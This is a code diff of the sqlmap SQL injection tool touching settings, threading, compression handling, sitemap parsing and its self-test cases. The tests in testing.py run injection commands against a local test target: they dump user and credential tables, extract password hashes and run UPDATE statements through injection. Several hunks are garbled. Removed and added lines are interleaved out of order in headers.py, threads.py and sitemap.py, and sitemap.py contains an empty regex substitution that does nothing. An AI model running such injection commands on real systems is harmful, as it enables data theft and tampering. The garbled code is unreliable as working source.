 USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
 REFERER_ALIASES = ("ref", "referer", "referrer")
 HOST_ALIASES = ("host",)
 
 # DBMSes with upper case identifiers
-UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.HSQLDB, DBMS.DERBY, DBMS.ALTIBASE))
+UPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.HSQLDB, DBMS.DERBY, DBMS.ALTIBASE, DBMS.SNOWFLAKE))
 
 # Default schemas to use (when unable to enumerate)
 H2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
@@ -775,7 +782,7 @@ MAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024
 # For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)
 MAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024
 
-# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), identYwaf, htmlParser, etc.)
+# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), htmlParser, etc.)
 HEURISTIC_PAGE_SIZE_THRESHOLD = 64 * 1024
 
 # Maximum (multi-threaded) length of entry in bisection algorithm
@@ -797,7 +804,7 @@ CHECK_ZERO_COLUMNS_THRESHOLD = 10
 CHECK_SQLITE_TYPE_THRESHOLD = 100
 
 # Boldify all logger messages containing these "patterns"
-BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED", "for more than", "connection to ", "will be trimmed")
+BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "does not seem to be", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA", "specific response", "NULL connection is supported", "PASSED", "FAILED", "for more than", "connection to ", "will be trimmed", "counterpart to database")
 
 # Regular expression used to search for bold-patterns
 BOLD_PATTERNS_REGEX = '|'.join(BOLD_PATTERNS)

lib/core/subprocessng.py

@@ -75,7 +75,7 @@ class Popen(subprocess.Popen):
     def recv_err(self, maxsize=None):
         return self._recv('stderr', maxsize)
 
-    def send_recv(self, input='', maxsize=None):
+    def send_recv(self, input=b'', maxsize=None):
         return self.send(input), self.recv(maxsize), self.recv_err(maxsize)
 
     def get_conn_maxsize(self, which, maxsize):
@@ -97,7 +97,7 @@ class Popen(subprocess.Popen):
             try:
                 x = msvcrt.get_osfhandle(self.stdin.fileno())
                 (_, written) = WriteFile(x, input)
-            except ValueError:
+            except (ValueError, NameError):
                 return self._close('stdin')
             except Exception as ex:
                 if getattr(ex, "args", None) and ex.args[0] in (109, errno.ESHUTDOWN):
@@ -187,7 +187,7 @@ def recv_some(p, t=.1, e=1, tr=5, stderr=0):
             y.append(r)
         else:
             time.sleep(max((x - time.time()) / tr, 0))
-    return b''.join(y)
+    return b''.join(getBytes(i) for i in y)
 
 def send_all(p, data):
     if not data:

lib/core/target.py

@@ -453,6 +453,14 @@ def _setHashDB():
                 errMsg = "unable to flush the session file ('%s')" % getSafeExString(ex)
                 raise SqlmapFilePathException(errMsg)
 
+        for suffix in ("-shm", "-wal"):
+            leftover = conf.hashDBFile + suffix
+            if os.path.exists(leftover):
+                try:
+                    os.remove(leftover)
+                except OSError:
+                    pass
+
     conf.hashDB = HashDB(conf.hashDBFile)
 
 def _resumeHashDBValues():

lib/core/testing.py

@@ -43,7 +43,7 @@ def vulnTest():
         ("-u <url> --data=\"reflect=1\" --flush-session --wizard --disable-coloring", ("Please choose:", "back-end DBMS: SQLite", "current user is DBA: True", "banner: '3.")),
         ("-u <url> --data=\"code=1\" --code=200 --technique=B --banner --no-cast --flush-session", ("back-end DBMS: SQLite", "banner: '3.", "~COALESCE(CAST(")),
         (u"-c <config> --flush-session --output-dir=\"<tmpdir>\" --smart --roles --statements --hostname --privileges --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'", "on SQLite it is not possible", "as the output directory")),
-        (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'",)),
+        (u"-u <url> --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --titles --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'", "~with --string",)),
         ("-m <multiple> --flush-session --technique=B --banner", ("/3] URL:", "back-end DBMS: SQLite", "banner: '3.")),
         ("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")),
         ("-u \"<url>&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)),
@@ -62,19 +62,20 @@ def vulnTest():
         ("-u <base> --flush-session -H \"Foo: Bar\" -H \"Sna: Fu\" --data=\"<root><param name=\\\"id\\\" value=\\\"1*\\\"/></root>\" --union-char=1 --mobile --answers=\"smartphone=3\" --banner --smart -v 5", ("might be injectable", "Payload: <root><param name=\"id\" value=\"1", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.", "Nexus", "Sna: Fu", "Foo: Bar")),
         ("-u <base> --flush-session --technique=BU --method=PUT --data=\"a=1;id=1;b=2\" --param-del=\";\" --skip-static --har=<tmpfile> --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: UNION query", "2 entries")),
         ("-u <url> --flush-session -H \"id: 1*\" --tables -t <tmpfile>", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")),
-        ("-u <url> --flush-session --banner --invalid-logical --technique=B --predict-output --test-filter=\"OR boolean\" --tamper=space2dash", ("banner: '3.", " LIKE ")),
+        ("-u <url> --flush-session --banner --invalid-logical --technique=B --predict-output --titles --test-filter=\"OR boolean\" --tamper=space2dash", ("banner: '3.", " LIKE ")),
         ("-u <url> --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")),
-        ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users", ("NULL connection is supported with HEAD method", "banner: '3.", "users | 5")),
+        ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users", ("NULL connection is supported with HEAD method", "banner: '3.", "users | 30")),
         ("-u <base> --data=\"aWQ9MQ==\" --flush-session --base64=POST -v 6", ("aWQ9MTtXQUlURk9SIERFTEFZICcwOjA",)),
         ("-u <url> --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")),
-        ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")),
+        ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "27 entries", "6E616D6569736E756C6C")),
-        ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")),
+        ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 31 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")),
-        ("-u <url> --flush-session --technique=BU --all", ("5 entries", "Type: boolean-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")),
+        ("-u <url> --flush-session --technique=BU --all", ("30 entries", "Type: boolean-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")),
-        ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")),
+        ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [30]", "nameisnull")),
         ("-u \"<url>&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)),
         ("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
-        ("-d \"<direct>\" --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)", "dumped to SQLITE database")),
+        ("-d \"<direct>\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
-        ("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5,foobar,nameisnull", "'987654321'",)),
+        ("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),
+        ("-u <base>csrf --data=\"id=1&csrf_token=1\" --banner --answers=\"update=y\" --flush-session", ("back-end DBMS: SQLite", "banner: '3.")),
         ("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")),
     )
 
@@ -182,7 +183,7 @@ def vulnTest():
 
     for options, checks in TESTS:
         status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS)))
-        dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
+        dataToStdout("\r[%s] [INFO] completed: %s" % (time.strftime("%X"), status))
 
         if IS_WIN and "uraj" in options:
             options = options.replace(u"\u0161u\u0107uraj", "sucuraj")
@@ -281,7 +282,7 @@ def smokeTest():
 
                 count += 1
                 status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))
-                dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
+                dataToStdout("\r[%s] [INFO] completed: %s" % (time.strftime("%X"), status))
 
     def _(node):
         for __ in dir(node):

lib/core/threads.py

@@ -188,13 +188,15 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
             threads.append(thread)
 
         # And wait for them to all finish
-        alive = True
+        while True:
-        while alive:
             alive = False
             for thread in threads:
                 if thread.is_alive():
                     alive = True
-                    time.sleep(0.1)
+                    break
+            if not alive:
+                break
+            time.sleep(0.1)
 
     except (KeyboardInterrupt, SqlmapUserQuitException) as ex:
         print()
@@ -211,8 +213,8 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
         if numThreads > 1:
             logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else ""))
         try:
-            while (threading.active_count() > 1):
+            while threading.active_count() > 1:
-                pass
+                time.sleep(0.1)
 
         except KeyboardInterrupt:
             kb.multipleCtrlC = True

lib/core/update.py

@@ -163,7 +163,7 @@ def update():
             infoMsg += "to use a GitHub for Windows client for updating "
             infoMsg += "purposes (https://desktop.github.com/) or just "
             infoMsg += "download the latest snapshot from "
-            infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads"
+            infoMsg += "https://github.com/sqlmapproject/sqlmap/releases"
         else:
             infoMsg = "for Linux platform it's recommended "
             infoMsg += "to install a standard 'git' package (e.g.: 'apt install git')"

lib/core/wordlist.py

@@ -27,6 +27,7 @@ class Wordlist(six.Iterator):
     def __init__(self, filenames, proc_id=None, proc_count=None, custom=None):
         self.filenames = [filenames] if isinstance(filenames, six.string_types) else filenames
         self.fp = None
+        self.zip_file = None
         self.index = 0
         self.counter = -1
         self.current = None
@@ -49,16 +50,16 @@ class Wordlist(six.Iterator):
             self.current = self.filenames[self.index]
             if isZipFile(self.current):
                 try:
-                    _ = zipfile.ZipFile(self.current, 'r')
+                    self.zip_file = zipfile.ZipFile(self.current, 'r')
                 except zipfile.error as ex:
                     errMsg = "something appears to be wrong with "
                     errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
                     errMsg += "sure that you haven't made any changes to it"
                     raise SqlmapInstallationException(errMsg)
-                if len(_.namelist()) == 0:
+                if len(self.zip_file.namelist()) == 0:
                     errMsg = "no file(s) inside '%s'" % self.current
                     raise SqlmapDataException(errMsg)
-                self.fp = _.open(_.namelist()[0])
+                self.fp = self.zip_file.open(self.zip_file.namelist()[0])
             else:
                 self.fp = open(self.current, "rb")
             self.iter = iter(self.fp)
@@ -70,6 +71,10 @@ class Wordlist(six.Iterator):
             self.fp.close()
             self.fp = None
 
+        if self.zip_file:
+            self.zip_file.close()
+            self.zip_file = None
+
     def __next__(self):
         retVal = None
         while True:

lib/parse/cmdline.py

@@ -276,6 +276,9 @@ def cmdLineParser(argv=None):
         request.add_argument("--skip-urlencode", dest="skipUrlEncode", action="store_true",
             help="Skip URL encoding of payload data")
 
+        request.add_argument("--skip-xmlencode", dest="skipXmlEncode", action="store_true",
+            help="Skip safe encoding of payload data for SOAP/XML")
+
         request.add_argument("--csrf-token", dest="csrfToken",
             help="Parameter used to hold anti-CSRF token")
 

lib/parse/configfile.py

@@ -64,7 +64,7 @@ def configFileParser(configFile):
     logger.debug(debugMsg)
 
     checkFile(configFile)
-    configFP = openFile(configFile, "rb")
+    configFP = openFile(configFile, 'r')
 
     try:
         config = UnicodeRawConfigParser()

lib/parse/headers.py

@@ -29,9 +29,8 @@ def headersParser(headers):
             "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
         }
 
-    for header in (_.lower() for _ in headers if _.lower() in kb.headerPaths):
+    for header, xmlfile in kb.headerPaths.items():
-        value = headers[header]
+        if header in headers:
-        xmlfile = kb.headerPaths[header]
+            handler = FingerprintHandler(headers[header], kb.headersFp)
-        handler = FingerprintHandler(value, kb.headersFp)
+            parseXmlFile(xmlfile, handler)
-        parseXmlFile(xmlfile, handler)
+            parseXmlFile(paths.GENERIC_XML, handler)
-        parseXmlFile(paths.GENERIC_XML, handler)

lib/parse/payloads.py

@@ -44,7 +44,7 @@ def parseXmlNode(node):
     for element in node.findall("boundary"):
         boundary = AttribDict()
 
-        for child in element:
+        for child in element.findall("*"):
             if child.text:
                 values = cleanupVals(child.text, child.tag)
                 boundary[child.tag] = values
@@ -56,18 +56,19 @@ def parseXmlNode(node):
     for element in node.findall("test"):
         test = AttribDict()
 
-        for child in element:
+        for child in element.findall("*"):
             if child.text and child.text.strip():
                 values = cleanupVals(child.text, child.tag)
                 test[child.tag] = values
             else:
-                if len(child.findall("*")) == 0:
+                progeny = child.findall("*")
+                if len(progeny) == 0:
                     test[child.tag] = None
                     continue
                 else:
                     test[child.tag] = AttribDict()
 
-                for gchild in child:
+                for gchild in progeny:
                     if gchild.tag in test[child.tag]:
                         prevtext = test[child.tag][gchild.tag]
                         test[child.tag][gchild.tag] = [prevtext, gchild.text]

lib/parse/sitemap.py

@@ -17,7 +17,7 @@ from thirdparty.six.moves import http_client as _http_client
 
 abortedFlag = None
 
-def parseSitemap(url, retVal=None):
+def parseSitemap(url, retVal=None, visited=None):
     global abortedFlag
 
     if retVal is not None:
@@ -27,6 +27,12 @@ def parseSitemap(url, retVal=None):
         if retVal is None:
             abortedFlag = False
             retVal = OrderedSet()
+            visited = set()
+
+        if url in visited:
+            return retVal
+
+        visited.add(url)
 
         try:
             content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
@@ -34,18 +40,28 @@ def parseSitemap(url, retVal=None):
             errMsg = "invalid URL given for sitemap ('%s')" % url
             raise SqlmapSyntaxException(errMsg)
 
-        for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
+        if content:
-            if abortedFlag:
+            content = re.sub(r"", "", content, flags=re.DOTALL)
-                break
+
-            url = match.group(1).strip()
+            for match in re.finditer(r"<\w*?loc[^>]*>\s*([^<]+)", content, re.I):
-            if url.endswith(".xml") and "sitemap" in url.lower():
+                if abortedFlag:
-                if kb.followSitemapRecursion is None:
+                    break
-                    message = "sitemap recursion detected. Do you want to follow? [y/N] "
+
-                    kb.followSitemapRecursion = readInput(message, default='N', boolean=True)
+                foundUrl = match.group(1).strip()
-                if kb.followSitemapRecursion:
+
-                    parseSitemap(url, retVal)
+                # Basic validation to avoid junk
-            else:
+                if not foundUrl.startswith("http"):
-                retVal.add(url)
+                    continue
+
+                if foundUrl.endswith(".xml") and "sitemap" in foundUrl.lower():
+                    if kb.followSitemapRecursion is None:
+                        message = "sitemap recursion detected. Do you want to follow? [y/N] "
+                        kb.followSitemapRecursion = readInput(message, default='N', boolean=True)
+
+                    if kb.followSitemapRecursion:
+                        parseSitemap(foundUrl, retVal, visited)
+                else:
+                    retVal.add(foundUrl)
 
     except KeyboardInterrupt:
         abortedFlag = True

lib/request/basic.py

@@ -10,7 +10,6 @@ import gzip
 import io
 import logging
 import re
-import struct
 import zlib
 
 from lib.core.common import Backend
@@ -44,7 +43,8 @@ from lib.core.settings import BLOCKED_IP_REGEX
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import EVENTVALIDATION_REGEX
 from lib.core.settings import HEURISTIC_PAGE_SIZE_THRESHOLD
-from lib.core.settings import IDENTYWAF_PARSE_LIMIT
+from lib.core.settings import IDENTYWAF_PARSE_COUNT_LIMIT
+from lib.core.settings import IDENTYWAF_PARSE_PAGE_LIMIT
 from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
 from lib.core.settings import META_CHARSET_REGEX
 from lib.core.settings import PARSE_HEADERS_LIMIT
@@ -249,6 +249,7 @@ def checkCharEncoding(encoding, warn=True):
 
     return encoding
 
+@lockedmethod
 def getHeuristicCharEncoding(page):
     """
     Returns page encoding charset detected by usage of heuristics
@@ -259,9 +260,12 @@ def getHeuristicCharEncoding(page):
     'ascii'
     """
 
-    key = hash(page)
+    key = (len(page), hash(page))
-    retVal = kb.cache.encoding[key] if key in kb.cache.encoding else detect(page[:HEURISTIC_PAGE_SIZE_THRESHOLD])["encoding"]
+
-    kb.cache.encoding[key] = retVal
+    retVal = kb.cache.encoding.get(key)
+    if retVal is None:
+        retVal = detect(page[:HEURISTIC_PAGE_SIZE_THRESHOLD])["encoding"]
+        kb.cache.encoding[key] = retVal
 
     if retVal and retVal.lower().replace('-', "") == UNICODE_ENCODING.lower().replace('-', ""):
         infoMsg = "heuristics detected web page charset '%s'" % retVal
@@ -282,8 +286,8 @@ def decodePage(page, contentEncoding, contentType, percentDecode=True):
     if not page or (conf.nullConnection and len(page) < 2):
         return getUnicode(page)
 
-    contentEncoding = contentEncoding.lower() if hasattr(contentEncoding, "lower") else ""
+    contentEncoding = getText(contentEncoding).lower() if contentEncoding else ""
-    contentType = contentType.lower() if hasattr(contentType, "lower") else ""
+    contentType = getText(contentType).lower() if contentType else ""
 
     if contentEncoding in ("gzip", "x-gzip", "deflate"):
         if not kb.pageCompress:
@@ -291,14 +295,16 @@ def decodePage(page, contentEncoding, contentType, percentDecode=True):
 
         try:
             if contentEncoding == "deflate":
-                data = io.BytesIO(zlib.decompress(page, -15))  # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations
+                obj = zlib.decompressobj(-15)
+                page = obj.decompress(page, MAX_CONNECTION_TOTAL_SIZE + 1)
+                page += obj.flush()
+                if len(page) > MAX_CONNECTION_TOTAL_SIZE:
+                    raise Exception("size too large")
             else:
                 data = gzip.GzipFile("", "rb", 9, io.BytesIO(page))
-                size = struct.unpack("<l", page[-4:])[0]  # Reference: http://pydoc.org/get.cgi/usr/local/lib/python2.5/gzip.py
+                page = data.read(MAX_CONNECTION_TOTAL_SIZE + 1)
-                if size > MAX_CONNECTION_TOTAL_SIZE:
+                if len(page) > MAX_CONNECTION_TOTAL_SIZE:
                     raise Exception("size too large")
-
-            page = data.read()
         except Exception as ex:
             if b"<html" not in page:  # in some cases, invalid "Content-Encoding" appears for plain HTML (should be ignored)
                 errMsg = "detected invalid data for declared content "
@@ -390,8 +396,8 @@ def processResponse(page, responseHeaders, code=None, status=None):
         if msg:
             logger.warning("parsed DBMS error message: '%s'" % msg.rstrip('.'))
 
-    if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_LIMIT:
+    if not conf.skipWaf and kb.processResponseCounter < IDENTYWAF_PARSE_COUNT_LIMIT:
-        rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:HEURISTIC_PAGE_SIZE_THRESHOLD])
+        rawResponse = "%s %s %s\n%s\n%s" % (_http_client.HTTPConnection._http_vsn_str, code or "", status or "", "".join(getUnicode(responseHeaders.headers if responseHeaders else [])), page[:IDENTYWAF_PARSE_PAGE_LIMIT] if not kb.checkWafMode else page[:HEURISTIC_PAGE_SIZE_THRESHOLD])
 
         with kb.locks.identYwaf:
             identYwaf.non_blind.clear()

lib/request/connect.py

@@ -227,17 +227,18 @@ class Connect(object):
 
     @staticmethod
     def _connReadProxy(conn):
-        retVal = b""
+        parts = []
 
         if not kb.dnsMode and conn:
             headers = conn.info()
             if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()):
-                retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE)
+                part = conn.read(MAX_CONNECTION_TOTAL_SIZE)
-                if len(retVal) == MAX_CONNECTION_TOTAL_SIZE:
+                if len(part) == MAX_CONNECTION_TOTAL_SIZE:
                     warnMsg = "large compressed response detected. Disabling compression"
                     singleTimeWarnMessage(warnMsg)
                     kb.pageCompress = False
                     raise SqlmapCompressionException
+                parts.append(part)
             else:
                 while True:
                     if not conn:
@@ -252,18 +253,20 @@ class Connect(object):
                         warnMsg = "large response detected. This could take a while"
                         singleTimeWarnMessage(warnMsg)
                         part = re.sub(getBytes(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start)), getBytes("%s%s%s" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part)
-                        retVal += part
+                        parts.append(part)
                     else:
-                        retVal += part
+                        parts.append(part)
                         break
 
-                    if len(retVal) > MAX_CONNECTION_TOTAL_SIZE:
+                    if sum(len(_) for _ in parts) > MAX_CONNECTION_TOTAL_SIZE:
                         warnMsg = "too large response detected. Automatically trimming it"
                         singleTimeWarnMessage(warnMsg)
                         break
 
         if conf.yuge:
-            retVal = YUGE_FACTOR * retVal
+            parts = YUGE_FACTOR * parts
+
+        retVal = b"".join(parts)
 
         return retVal
 
@@ -490,7 +493,7 @@ class Connect(object):
                 headers = forgeHeaders(auxHeaders, headers)
 
             if kb.headersFile:
-                content = openFile(kb.headersFile, "rb").read()
+                content = openFile(kb.headersFile, 'r').read()
                 for line in content.split("\n"):
                     line = getText(line.strip())
                     if ':' in line:
@@ -1113,7 +1116,7 @@ class Connect(object):
             logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload.replace('\\', BOUNDARY_BACKSLASH_MARKER)).replace(BOUNDARY_BACKSLASH_MARKER, '\\'))
 
             if place == PLACE.CUSTOM_POST and kb.postHint:
-                if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
+                if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML) and not conf.skipXmlEncode:
                     # payloads in SOAP/XML should have chars > and < replaced
                     # with their HTML encoded counterparts
                     payload = payload.replace("&#", SAFE_HEX_MARKER)

lib/request/dns.py

@@ -89,17 +89,22 @@ class DNSServer(object):
 
     def _check_localhost(self):
         response = b""
+        s = None
 
         try:
             s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+            s.settimeout(1.0)
             s.connect(("", 53))
             s.send(binascii.unhexlify("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000"))  # A www.google.com
             response = s.recv(512)
         except:
             pass
         finally:
-            if response and b"google" in response:
+            if s:
-                raise socket.error("another DNS service already running on '0.0.0.0:53'")
+                s.close()
+
+        if response and b"google" in response:
+            raise socket.error("another DNS service already running on '0.0.0.0:53'")
 
     def pop(self, prefix=None, suffix=None):
         """

lib/request/httpshandler.py

@@ -65,6 +65,7 @@ class HTTPSConnection(_http_client.HTTPSConnection):
         #               https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
         if hasattr(ssl, "SSLContext"):
             for protocol in (_ for _ in _protocols if _ >= ssl.PROTOCOL_TLSv1):
+                sock = None
                 try:
                     sock = create_sock()
                     if protocol not in _contexts:
@@ -94,6 +95,8 @@ class HTTPSConnection(_http_client.HTTPSConnection):
                         sock.close()
                 except (ssl.SSLError, socket.error, _http_client.BadStatusLine, AttributeError) as ex:
                     self._tunnel_host = None
+                    if sock:
+                        sock.close()
                     logger.debug("SSL connection error occurred for '%s' ('%s')" % (_lut[protocol], getSafeExString(ex)))
 
         elif hasattr(ssl, "wrap_socket"):